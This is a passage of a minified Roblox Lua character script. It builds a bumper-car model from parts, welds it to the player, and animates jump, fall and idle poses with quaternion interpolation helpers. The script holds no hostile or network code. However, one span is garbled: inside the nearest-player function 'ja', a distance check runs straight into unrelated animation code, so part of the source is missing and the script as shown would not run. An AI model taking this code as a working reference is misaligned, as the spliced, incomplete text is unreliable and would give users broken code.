olor3.new(0.458824,0,0)})Part=New("Part",BumperCar,"Part7",{BrickColor=BrickColor.new("Really black"),Material=Enum.Material.SmoothPlastic,Shape=Enum.PartType.Cylinder,Size=Vector3.new(1.49999988,0.200000003,0.200000003),CFrame=CFrame.new(-4.52999973,10.6799994,-40.1199951,-0.258819044,3.08638382e-09,0.965925813,-0.933012724,-0.258818835,-0.25,0.249999776,-0.965925872,0.0669872463),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,TopSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.0666667,0.0666667,0.0666667)})Part=New("Part",BumperCar,"Part8",{BrickColor=BrickColor.new("Really black"),Material=Enum.Material.SmoothPlastic,Shape=Enum.PartType.Cylinder,Size=Vector3.new(0.899999976,4,4),CFrame=CFrame.new(-5.16500664,7.55000019,-38.9631157,-4.37113883e-08,-1,0,1,-4.37113883e-08,0,0,0,0.999999821),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,TopSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.0666667,0.0666667,0.0666667)})Wedge=New("WedgePart",BumperCar,"Wedge",{BrickColor=BrickColor.new("Maroon"),Material=Enum.Material.SmoothPlastic,Size=Vector3.new(1.69999993,0.100000024,0.0999999493),CFrame=CFrame.new(-5.15999985,10.0500002,-36.4131165,1,0,1.74845553e-07,0,1,0,-1.74845553e-07,0,1),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.458824,0,0)})Wedge=New("WedgePart",BumperCar,"Wedge",{BrickColor=BrickColor.new("Maroon"),Material=Enum.Material.SmoothPlastic,Size=Vector3.new(0.200000048,1.60000002,0.999999523),CFrame=CFrame.new(-3.50999975,8.90000057,-38.5631142,-1,0,-8.74227766e-08,0,1,0,8.74227766e-08,0,-1),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.458824,0,0)})Wedge=New("WedgePart",BumperCar,"Wedge",{BrickColor=BrickColor.new("Maroon"),Material=Enum.Material.SmoothPlastic,Size=Vector3.new(0.200000048,1,3.89999962),CFrame=CFrame.new(-3.50999975,8.60000038,-37.1131134,-1,0,-8.74227766e-08,0,1,0,8.74227766e-08,0,-1),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.458824,0,0)})Part=New("Part",BumperCar,"Part9",{BrickColor=BrickColor.new("Really black"),Material=Enum.Material.SmoothPlastic,Shape=Enum.PartType.Cylinder,Size=Vector3.new(0.399999857,0.300000012,0.300000012),CFrame=CFrame.new(-4.67235041,10.1668425,-39.9824944,-0.258819044,3.08638382e-09,0.965925813,-0.933012724,-0.258818835,-0.25,0.249999776,-0.965925872,0.0669872463),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,TopSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.0666667,0.0666667,0.0666667)})Part=New("Part",BumperCar,"Part10",{BrickColor=BrickColor.new("Really black"),Material=Enum.Material.SmoothPlastic,Shape=Enum.PartType.Cylinder,Size=Vector3.new(1.5,0.0500000007,0.0500000007),CFrame=CFrame.new(-3.11038089,12.7026892,-41.3446198,-0.774519205,-0.353553116,0.524519026,-0.408493787,-0.353553116,-0.841506362,0.482962519,-0.866025567,0.129409432),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,TopSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.0666667,0.0666667,0.0666667)})Part=New("Part",BumperCar,"Part11",{BrickColor=BrickColor.new("Maroon"),Material=Enum.Material.SmoothPlastic,Shape=Enum.PartType.Cylinder,Size=Vector3.new(0.999999881,2.0999999,2.0999999),CFrame=CFrame.new(-5.15999985,8.69999981,-40.1499977,-2.08616257e-07,0,1,0,1,0,-1,0,-2.08616257e-07),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,TopSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.458824,0,0)})Wedge=New("WedgePart",BumperCar,"Wedge",{BrickColor=BrickColor.new("Black"),Material=Enum.Material.SmoothPlastic,Size=Vector3.new(0.799999952,0.600000024,0.299999565),CFrame=CFrame.new(-5.85999918,9.45000076,-39.5131149,4.37113883e-08,1,1.19248771e-08,7.10542736e-15,-1.19248762e-08,0.99999994,1,-4.37113883e-08,6.06292123e-15),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.105882,0.164706,0.207843)})Part=New("Part",BumperCar,"Part12",{BrickColor=BrickColor.new("Maroon"),Material=Enum.Material.SmoothPlastic,Shape=Enum.PartType.Cylinder,Size=Vector3.new(0.899999857,2.20000005,2.20000005),CFrame=CFrame.new(-5.15999985,8.69999981,-40.0999985,-2.08616257e-07,0,1,0,1,0,-1,0,-2.08616257e-07),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,TopSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.458824,0,0)})Wedge=New("WedgePart",BumperCar,"Wedge",{BrickColor=BrickColor.new("Black"),Material=Enum.Material.SmoothPlastic,Size=Vector3.new(0.799999952,0.600000024,0.199999571),CFrame=CFrame.new(-4.46000051,9.70000076,-39.5131149,-1.31134158e-07,1,1.19248691e-08,8.74227695e-08,1.19248798e-08,-0.99999994,-1,-1.31134158e-07,-8.74227766e-08),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.105882,0.164706,0.207843)})Wedge=New("WedgePart",BumperCar,"Wedge",{BrickColor=BrickColor.new("Black"),Material=Enum.Material.SmoothPlastic,Size=Vector3.new(0.400000006,0.300000012,2.9000001),CFrame=CFrame.new(-5.15999985,9.55000019,-34.9131165,1,0,1.74845553e-07,0,1,0,-1.74845553e-07,0,1),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.105882,0.164706,0.207843)})Wedge=New("WedgePart",BumperCar,"Wedge",{BrickColor=BrickColor.new("Maroon"),Material=Enum.Material.SmoothPlastic,Size=Vector3.new(0.0999999046,1,0.299999952),CFrame=CFrame.new(-5.96000004,9.60000038,-36.2131157,-1,0,-8.74227766e-08,0,1,0,8.74227766e-08,0,-1),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.458824,0,0)})Wedge=New("WedgePart",BumperCar,"Wedge",{BrickColor=BrickColor.new("Black"),Material=Enum.Material.SmoothPlastic,Size=Vector3.new(0.799999952,0.600000024,1.49999952),CFrame=CFrame.new(-3.8599999,8.85000038,-39.5131149,-1.31134158e-07,1,1.19248691e-08,8.74227695e-08,1.19248798e-08,-0.99999994,-1,-1.31134158e-07,-8.74227766e-08),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.105882,0.164706,0.207843)})Wedge=New("WedgePart",BumperCar,"Wedge",{BrickColor=BrickColor.new("Black"),Material=Enum.Material.SmoothPlastic,Size=Vector3.new(0.799999952,0.600000024,0.199999571),CFrame=CFrame.new(-5.85999918,9.70000076,-39.5131149,4.37113883e-08,-1,-1.19248771e-08,8.74227695e-08,1.19248798e-08,-0.99999994,1,4.37113883e-08,8.74227766e-08),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.105882,0.164706,0.207843)})Part=New("Part",BumperCar,"Part13",{BrickColor=BrickColor.new("Maroon"),Material=Enum.Material.SmoothPlastic,Shape=Enum.PartType.Cylinder,Size=Vector3.new(2.5999999,1.20000005,1.20000005),CFrame=CFrame.new(-4.51500654,8.19999981,-34.8631134,-2.08616257e-07,0,1,0,1,0,-1,0,-2.08616257e-07),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,TopSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.458824,0,0)})Part=New("Part",BumperCar,"Part14",{BrickColor=BrickColor.new("Black"),Material=Enum.Material.SmoothPlastic,Size=Vector3.new(3.34999967,0.0999999866,2.69999981),CFrame=CFrame.new(-5.1150074,8.15000057,-37.7131157,1,0,0,0,1,0,0,0,1),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,TopSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.105882,0.164706,0.207843)})Part=New("Part",BumperCar,"Part15",{BrickColor=BrickColor.new("Maroon"),Material=Enum.Material.SmoothPlastic,Shape=Enum.PartType.Cylinder,Size=Vector3.new(2.5999999,1.20000005,1.20000005),CFrame=CFrame.new(-5.81500626,8.19999981,-34.8631134,-2.08616257e-07,0,1,0,1,0,-1,0,-2.08616257e-07),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,TopSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.458824,0,0)})Wedge=New("WedgePart",BumperCar,"Wedge",{BrickColor=BrickColor.new("Black"),Material=Enum.Material.SmoothPlastic,Size=Vector3.new(0.400000006,0.300000012,0.200000092),CFrame=CFrame.new(-5.15999985,9.55000019,-33.3631172,-1,0,-2.62268316e-07,0,1,0,2.62268316e-07,0,-1),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.105882,0.164706,0.207843)})Wedge=New("WedgePart",BumperCar,"Wedge",{BrickColor=BrickColor.new("Maroon"),Material=Enum.Material.SmoothPlastic,Size=Vector3.new(0.099999845,0.199999988,0.299999952),CFrame=CFrame.new(-4.35999966,9.90000057,-36.2131157,1,7.64274186e-15,0,7.64274186e-15,-1,-8.74227766e-08,0,8.74227766e-08,-1),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.458824,0,0)})Wedge=New("WedgePart",BumperCar,"Wedge",{BrickColor=BrickColor.new("Medium blue"),Material=Enum.Material.SmoothPlastic,Transparency=0.5,Transparency=0.5,Size=Vector3.new(1.49999988,0.980000019,0.279999942),CFrame=CFrame.new(-5.16000032,9.59000015,-36.2031174,-1,0,-8.74227766e-08,0,1,0,8.74227766e-08,0,-1),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.431373,0.6,0.792157)})Part=New("Part",BumperCar,"Part16",{BrickColor=BrickColor.new("Dark stone grey"),Material=Enum.Material.SmoothPlastic,Size=Vector3.new(3.8499999,0.099999994,4),CFrame=CFrame.new(-5.16500711,8.05000019,-36.9631157,1,0,0,0,1,0,0,0,1),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,TopSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.388235,0.372549,0.384314)})Wedge=New("WedgePart",BumperCar,"Wedge",{BrickColor=BrickColor.new("Black"),Material=Enum.Material.SmoothPlastic,Size=Vector3.new(0.799999952,0.600000024,0.299999565),CFrame=CFrame.new(-4.45999908,9.45000076,-39.5131149,-1.31134158e-07,-1,-1.19248771e-08,7.10542736e-15,-1.19248762e-08,0.99999994,-1,1.31134158e-07,-5.0204151e-15),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.105882,0.164706,0.207843)})Wedge=New("WedgePart",BumperCar,"Wedge",{BrickColor=BrickColor.new("Maroon"),Material=Enum.Material.SmoothPlastic,Size=Vector3.new(1.69999993,0.100000024,0.299999952),CFrame=CFrame.new(-5.15999985,10.0500002,-36.2131157,-1,0,-8.74227766e-08,0,1,0,8.74227766e-08,0,-1),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.458824,0,0)})Wedge=New("WedgePart",BumperCar,"Wedge",{BrickColor=BrickColor.new("Black"),Material=Enum.Material.SmoothPlastic,Size=Vector3.new(0.400000006,1.4000001,0.200000092),CFrame=CFrame.new(-5.15999985,8.69999981,-33.3631172,1,8.74227766e-08,2.62268316e-07,8.74227766e-08,-1,2.29282247e-14,2.62268316e-07,0,-1),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.105882,0.164706,0.207843)})Wedge=New("WedgePart",BumperCar,"Wedge",{BrickColor=BrickColor.new("Maroon"),Material=Enum.Material.SmoothPlastic,Size=Vector3.new(1,1,2),CFrame=CFrame.new(-4.15999985,8.60000038,-35.3631172,-1.19248806e-08,1,-1.04250613e-15,1,1.19248806e-08,8.74227766e-08,8.74227766e-08,0,-1),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.458824,0,0)})Part=New("Part",BumperCar,"Part17",{BrickColor=BrickColor.new("Dark stone grey"),Material=Enum.Material.SmoothPlastic,Shape=Enum.PartType.Cylinder,Size=Vector3.new(0.099999994,3.9000001,3.9000001),CFrame=CFrame.new(-5.16500664,8.05000019,-35.0131149,-4.37113883e-08,-1,0,1,-4.37113883e-08,0,0,0,0.999999821),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,TopSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.388235,0.372549,0.384314)})Wedge=New("WedgePart",BumperCar,"Wedge",{BrickColor=BrickColor.new("Maroon"),Material=Enum.Material.SmoothPlastic,Size=Vector3.new(0.199999958,1,3.89999962),CFrame=CFrame.new(-6.80999994,8.60000038,-37.1131134,-1,0,-8.74227766e-08,0,1,0,8.74227766e-08,0,-1),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.458824,0,0)})Wedge=New("WedgePart",BumperCar,"Wedge",{BrickColor=BrickColor.new("Maroon"),Material=Enum.Material.SmoothPlastic,Size=Vector3.new(0.099999845,0.199999988,0.0999999493),CFrame=CFrame.new(-4.35999966,9.90000057,-36.4131165,-1,-1.52854837e-14,8.74227766e-08,7.64274186e-15,-1,-8.74227766e-08,8.74227766e-08,-8.74227766e-08,1),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.458824,0,0)})Wedge=New("WedgePart",BumperCar,"Wedge",{BrickColor=BrickColor.new("Maroon"),Material=Enum.Material.SmoothPlastic,Size=Vector3.new(3.5,1,1.19999993),CFrame=CFrame.new(-5.15999985,8.60000038,-35.7631149,-1,0,-8.74227766e-08,0,1,0,8.74227766e-08,0,-1),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.458824,0,0)})Wedge=New("WedgePart",BumperCar,"Wedge",{BrickColor=BrickColor.new("Maroon"),Material=Enum.Material.SmoothPlastic,Size=Vector3.new(1,1,2),CFrame=CFrame.new(-6.15999985,8.60000038,-35.3631172,9.9347659e-08,-1,8.68524799e-15,-1,-9.9347659e-08,-8.74227766e-08,8.74227766e-08,0,-1),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.458824,0,0)})Wedge=New("WedgePart",BumperCar,"Wedge",{BrickColor=BrickColor.new("Black"),Material=Enum.Material.SmoothPlastic,Size=Vector3.new(3,1,1.99000001),CFrame=CFrame.new(-5.15999985,8.60000038,-35.3581161,-1,0,-8.74227766e-08,0,1,0,8.74227766e-08,0,-1),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.105882,0.164706,0.207843)})Wedge=New("WedgePart",BumperCar,"Wedge",{BrickColor=BrickColor.new("Maroon"),Material=Enum.Material.SmoothPlastic,Size=Vector3.new(3.5,0.600000024,1.59999955),CFrame=CFrame.new(-5.15999985,8.90000057,-39.3631134,-1,0,-8.74227766e-08,8.74227766e-08,1.19248806e-08,-1,1.04250613e-15,-1,-1.19248806e-08),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.458824,0,0)})Part=New("Part",BumperCar,"Part18",{BrickColor=BrickColor.new("Maroon"),Material=Enum.Material.SmoothPlastic,Shape=Enum.PartType.Cylinder,Size=Vector3.new(0.799999833,2.29999995,2.29999995),CFrame=CFrame.new(-5.15999985,8.69999981,-40.0499992,-2.08616257e-07,0,1,0,1,0,-1,0,-2.08616257e-07),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,TopSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.458824,0,0)})Part=New("Part",BumperCar,"Part19",{BrickColor=BrickColor.new("Olive"),Material=Enum.Material.Neon,Shape=Enum.PartType.Cylinder,Size=Vector3.new(0.099999845,0.699999988,0.699999988),CFrame=CFrame.new(-4.51500607,8.5,-33.4031143,-2.08616257e-07,0,1,0,1,0,-1,0,-2.08616257e-07),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,TopSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.756863,0.745098,0.258824)})Part=New("Part",BumperCar,"Part20",{BrickColor=BrickColor.new("Maroon"),Material=Enum.Material.SmoothPlastic,Shape=Enum.PartType.Cylinder,Size=Vector3.new(0.899999857,2.39999986,2.39999986),CFrame=CFrame.new(-5.15999985,8.69999981,-39.5,-2.08616257e-07,0,1,0,1,0,-1,0,-2.08616257e-07),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,TopSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.458824,0,0)})Part=New("Part",BumperCar,"Part21",{BrickColor=BrickColor.new("Maroon"),Material=Enum.Material.SmoothPlastic,Shape=Enum.PartType.Cylinder,Size=Vector3.new(1.99999988,1.60000002,1.60000002),CFrame=CFrame.new(-5.15999985,9.05000019,-39.9999962,-2.08616257e-07,0,1,-1,1.19248806e-08,-2.08616257e-07,-1.19248806e-08,-1,-2.48772391e-15),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,TopSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.458824,0,0)})Part=New("Part",BumperCar,"Part22",{BrickColor=BrickColor.new("Maroon"),Material=Enum.Material.SmoothPlastic,Shape=Enum.PartType.Cylinder,Size=Vector3.new(0.699999809,2.0999999,2.0999999),CFrame=CFrame.new(-5.15999985,8.55000019,-35.5999985,-2.08616257e-07,0,1,0,1,0,-1,0,-2.08616257e-07),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,TopSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.458824,0,0)})Part=New("Part",BumperCar,"Part23",{BrickColor=BrickColor.new("Maroon"),Material=Enum.Material.SmoothPlastic,Shape=Enum.PartType.Cylinder,Size=Vector3.new(0.71999979,2.19999981,2.19999981),CFrame=CFrame.new(-5.15999985,8.60000038,-36.0099983,-2.08616257e-07,0,1,0,1,0,-1,0,-2.08616257e-07),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,TopSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.458824,0,0)})Part=New("Part",BumperCar,"Part24",{BrickColor=BrickColor.new("Black"),Material=Enum.Material.SmoothPlastic,Shape=Enum.PartType.Cylinder,Size=Vector3.new(2.79999995,0.800000072,0.800000072),CFrame=CFrame.new(-4.51500654,8.5,-34.7631149,-2.08616257e-07,0,1,0,1,0,-1,0,-2.08616257e-07),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,TopSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.105882,0.164706,0.207843)})Wedge=New("WedgePart",BumperCar,"Wedge",{BrickColor=BrickColor.new("Maroon"),Material=Enum.Material.SmoothPlastic,Size=Vector3.new(0.099999845,0.199999988,0.0999999493),CFrame=CFrame.new(-5.95999956,9.90000057,-36.4131165,-1,-1.52854837e-14,8.74227766e-08,7.64274186e-15,-1,-8.74227766e-08,8.74227766e-08,-8.74227766e-08,1),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.458824,0,0)})FrontPart=New("Part",BumperCar,"Part",{BrickColor=BrickColor.new("Really black"),Material=Enum.Material.SmoothPlastic,Size=Vector3.new(6,6,6),CFrame=CFrame.new(-5.16500664,7.55000019,-34.9631157,-4.37113883e-08,-1,0,1,-4.37113883e-08,0,0,0,0.999999821),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,TopSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.0666667,0.0666667,0.0666667),Transparency=1})local ii,ij={}function scan(p)for U,v in pairs(p:GetChildren())do if v:IsA("BasePart")then if ij then local c4=Instance.new("Weld")c4.Part0,c4.Part1=ij,v;c4.C0=v.CFrame:toObjectSpace(ij.CFrame):inverse()c4.Parent=ij end;table.insert(ii,v)ij=v end;scan(v)end end;scan(BumperCar)for U,v in pairs(ii)do v.Anchored=false;v.CanCollide=false end;BumperCar.Parent=Character;p=Character.BumperCar:GetChildren()for T=1,#p do p[T].Transparency=1 end;local ik={SoundService=game:GetService("SoundService"),Players=game:GetService("Players"),Debris=game:GetService("Debris"),Workspace=game:GetService("Workspace"),Lighting=game:GetService("Lighting"),HttpService=game:GetService("HttpService"),InsertService=game:GetService("InsertService")}local NeckCF=cn(0,1,0,-1,-0,-0,0,0,1,0,1,0)Humanoid.Animator:Destroy()Character.Animate:Destroy()local RootCF=CFrame.fromEulerAnglesXYZ(-1.57,0,3.14)local il=CFrame.fromEulerAnglesXYZ(0,1.6,0)local im=CFrame.fromEulerAnglesXYZ(0,-1.6,0)SWW=Instance.new("Weld")SWW.Name="SWW"SWW.Part0=Torso;SWW.C0=cn(0,-2.6,-1)*angles(math.rad(-0),math.rad(-180),math.rad(0))SWW.C1=cn(0,0,0)SWW.Part1=SwHandle;SWW.Parent=Torso;RSH,LSH=nil,nil;RW=Instance.new("Weld")LW=Instance.new("Weld")RH=Torso["Right Hip"]LH=Torso["Left Hip"]RSH=Torso["Right Shoulder"]LSH=Torso["Left Shoulder"]RSH.Parent=nil;LSH.Parent=nil;RW.Name="RW"RW.Part0=Torso;RW.C0=cn(1.5,0.5,0)RW.C1=cn(0,0.5,0)RW.Part1=RightArm;RW.Parent=Torso;LW.Name="LW"LW.Part0=Torso;LW.C0=cn(-1.5,0.5,0)LW.C1=cn(0,0.5,0)LW.Part1=LeftArm;LW.Parent=Torso;function clerp(a,b,t)local io={QuaternionFromCFrame(a)}local ip={QuaternionFromCFrame(b)}local iq,ir,is=a.x,a.y,a.z;local iu,iv,iw=b.x,b.y,b.z;local ix=1-t;return QuaternionToCFrame(ix*iq+t*iu,ix*ir+t*iv,ix*is+t*iw,QuaternionSlerp(io,ip,t))end;function QuaternionFromCFrame(cf)local iy,iz,iA,iB,iC,iD,iE,iF,iG,iH,iI,iJ=cf:components()local iK=iB+iF+iJ;if iK>0 then local s=math.sqrt(1+iK)local iL=0.5/s;return(iI-iG)*iL,(iD-iH)*iL,(iE-iC)*iL,s*0.5 else local T=0;if iF>iB then T=1 end;if iJ>(T==0 and iB or iF)then T=2 end;if T==0 then local s=math.sqrt(iB-iF-iJ+1)local iL=0.5/s;return 0.5*s,(iE+iC)*iL,(iH+iD)*iL,(iI-iG)*iL elseif T==1 then local s=math.sqrt(iF-iJ-iB+1)local iL=0.5/s;return(iC+iE)*iL,0.5*s,(iI+iG)*iL,(iD-iH)*iL elseif T==2 then local s=math.sqrt(iJ-iB-iF+1)local iL=0.5/s;return(iD+iH)*iL,(iG+iI)*iL,0.5*s,(iE-iC)*iL end end end;function QuaternionToCFrame(iM,iN,iO,x,iP,z,c4)local iQ,iR,iS=x+x,iP+iP,z+z;local iT,iU,iV=c4*iQ,c4*iR,c4*iS;local iW=x*iQ;local iX=x*iR;local iY=x*iS;local iZ=iP*iR;local i_=iP*iS;local j0=z*iS;return CFrame.new(iM,iN,iO,1-(iZ+j0),iX-iV,iY+iU,iX+iV,1-(iW+j0),i_-iT,iY-iU,i_+iT,1-(iW+iZ))end;function QuaternionSlerp(a,b,t)local j1=a[1]*b[1]+a[2]*b[2]+a[3]*b[3]+a[4]*b[4]local j2,j3;if j1>=0.0001 then if 1-j1>0.0001 then local j4=math.acos(j1)local j5=1/math.sin(j4)j2=math.sin((1-t)*j4)*j5;j3=math.sin(t*j4)*j5 else j2=1-t;j3=t end else if 1+j1>0.0001 then local j4=math.acos(-j1)local j5=1/math.sin(j4)j2=math.sin((t-1)*j4)*j5;j3=math.sin(t*j4)*j5 else j2=t-1;j3=t end end;return a[1]*j2+b[1]*j3,a[2]*j2+b[2]*j3,a[3]*j2+b[3]*j3,a[4]*j2+b[4]*j3 end;function swait(bA)if bA==0 or bA==nil then game:service'RunService'.RenderStepped:wait(0)else for T=0,bA do game:service'RunService'.RenderStepped:wait(0)end end end;function RemoveOutlines(ec)ec.TopSurface,ec.BottomSurface,ec.LeftSurface,ec.RightSurface,ec.FrontSurface,ec.BackSurface=10,10,10,10,10,10 end;function CreatePart(j6,ed,ee,ef,eg,eh,ei,k)local Part=Create("Part"){formFactor=j6,Parent=ed,Reflectance=ef,Transparency=eg,CanCollide=false,Locked=true,BrickColor=BrickColor.new(tostring(eh)),Name=ei,Size=k,Material=ee}RemoveOutlines(Part)return Part end;function CreateMesh(Mesh,Part,ej,ek,el,em)local en=Create(Mesh){Parent=Part,Offset=el,Scale=em}if Mesh=="SpecialMesh"then en.MeshType=ej;en.MeshId=ek end;return en end;function CreateWeld(ed,Part0,aA,eo,ep)local Weld=Create("Weld"){Parent=ed,Part0=Part0,Part1=aA,C0=eo,C1=ep}return Weld end;function rayCast(i,j7,j8,eV)return game:service("Workspace"):FindPartOnRay(Ray.new(i,j7.unit*(j8 or 999.999)),eV)end;function CreateSound(eq,par,er,pit)coroutine.resume(coroutine.create(function()local j9=Instance.new("Sound",par or workspace)j9.Volume=er;j9.Pitch=pit or 1;j9.SoundId=eq;wait()j9:play()game:GetService("Debris"):AddItem(j9,6)end))end;function CreateSong(eq,par,er,pit)coroutine.resume(coroutine.create(function()sou2=Instance.new("Sound",par or workspace)sou2.Volume=er;sou2.Pitch=1;sou2.SoundId=eq;wait()sou2:play()sou2.Looped=true end))end;local function ja(g,jb)local ij,jc=jb+1;for T,v in pairs(workspace:GetChildren())do if v:IsA'Model'and v~=Character and v:findFirstChild('Humanoid')and v:findFirstChild('Torso')and v:findFirstChild('Humanoid').Health>0 then local t=v.Torso;local jd=(t.Position-g.Position).magnitude;if jd<=jb then if jd2 then RW.C0=clerp(RW.C0,CFrame.new(1.5,0.5,0)*angles(math.rad(-50*math.cos(dQ/4)),math.rad(0),math.rad(4*math.cos(dQ/4))),.2)RH.C0=clerp(RH.C0,cn(1,-1+.1*math.cos(dQ/5),0)*il*angles(math.rad(-2),math.rad(0),math.rad(30*math.cos(dQ/4))),.3)LH.C0=clerp(LH.C0,cn(-1,-1+.1*math.cos(dQ/5),0)*im*angles(math.rad(-2),math.rad(0),math.rad(30*math.cos(dQ/4))),.3)elseif id<1 then RW.C0=clerp(RW.C0,CFrame.new(1.5,0.5,-.1)*angles(math.rad(5),math.rad(0),math.rad(5)),0.1)RH.C0=clerp(RH.C0,cn(1,-1,0)*il*angles(math.rad(-2),math.rad(5),math.rad(0)),.1)LH.C0=clerp(LH.C0,cn(-1,-1,0)*im*angles(math.rad(-2),math.rad(5),math.rad(0)),.1)end end;dS=false;game:GetService'RunService'.Stepped:connect(function()id=(RootPart.Velocity*Vector3.new(1,0,1)).magnitude;ie=RootPart.Velocity.y;dQ=dQ+dR;local hit,pos=rayCast(RootPart.Position,CFrame.new(RootPart.Position,RootPart.Position-Vector3.new(0,1,0)).lookVector,4,Character)if ia==true or ia==false then if RootPart.Velocity.y>-1 and hit==nil then N="Jump"inair=true;if dS==false then s.Pitch=1;s.Volume=1;Character.BumperCar:WaitForChild("Part14").Attachment69.Position=Vector3.new(0,-0.1,0.5)RootJoint.C0=clerp(RootJoint.C0,RootCF*cn(0.05,0,-1.1)*angles(math.rad(15),math.rad(0),math.rad(0)),.1)Torso.Neck.C0=clerp(Torso.Neck.C0,NeckCF*angles(math.rad(-1-1*math.cos(dQ/8)),math.rad(0),math.rad(-0)),.1)RW.C0=clerp(RW.C0,CFrame.new(1.5,0.5-0.01*math.cos(dQ/8),-.0)*angles(math.rad(45-1*math.cos(dQ/8)),math.rad(0),math.rad(-15)),0.1)LW.C0=clerp(LW.C0,CFrame.new(-1.5,0.5-0.01*math.cos(dQ/8),-.0)*angles(math.rad(45-1*math.cos(dQ/8)),math.rad(0),math.rad(15)),0.1)RH.C0=clerp(RH.C0,cn(1,-1-0.1*math.cos(dQ/8),0)*il*angles(math.rad(-6),math.rad(0),math.rad(90+.05*math.cos(dQ/25))),.1)LH.C0=clerp(LH.C0,cn(-1,-1-0.1*math.cos(dQ/8),-.0)*im*angles(math.rad(6),math.rad(-0),math.rad(-90+.05*math.cos(dQ/25))),.1)SWW.C0=clerp(SWW.C0,CFrame.new(0,-1.5,-.8)*angles(math.rad(-0),math.rad(-180),math.rad(0)),0.1)end elseif RootPart.Velocity.y<-1 and hit==nil then N="Fall"inair=true;if dS==false then s.Pitch=.7;s.Volume=.5;Character.BumperCar:WaitForChild("Part14").Attachment69.Position=Vector3.new(0,-0.1,0.5)RootJoint.C0=clerp(RootJoint.C0,RootCF*cn(0.05,0,-1.1)*angles(math.rad(-5),math.rad(0),math.rad(0)),.1)Torso.Neck.C0=clerp(Torso.Neck.C0,NeckCF*angles(math.rad(-1-1*math.cos(dQ/8)),math.rad(0),math.rad(-0)),.1)RW.C0=clerp(RW.C0,CFrame.new(1.5,0.5-0.01*math.cos(dQ/8),-.0)*angles(math.rad(180-1*math.cos(dQ/8)),math.rad(0),math.rad(45)),0.05)LW.C0=clerp(LW.C0,CFrame.new(-1.5,0.5-0.01*math.cos(dQ/8),-.0)*angles(math.rad(180-1*math.cos(dQ/8)),math.rad(0),math.rad(-45)),0.05)RH.C0=clerp(RH.C0,cn(1,-1-0.1*math.cos(dQ/8),0)*il*angles(math.rad(-6),math.rad(0),math.rad(90+.05*math.cos(dQ/25))),.1)LH.C0=clerp(LH.C0,cn(-1,-1-0.1*math.cos(dQ/8),-.0)*im*angles(math.rad(6),math.rad(-0),math.rad(-90+.05*math.cos(dQ/25))),.1)SWW.C0=clerp(SWW.C0,CFrame.new(0,-1.5,-.8)*angles(math.rad(-0),math.rad(-180),math.rad(0)),0.1)end elseif id<1 and hit~=nil then N="Idle"inair=false;if dS==false then 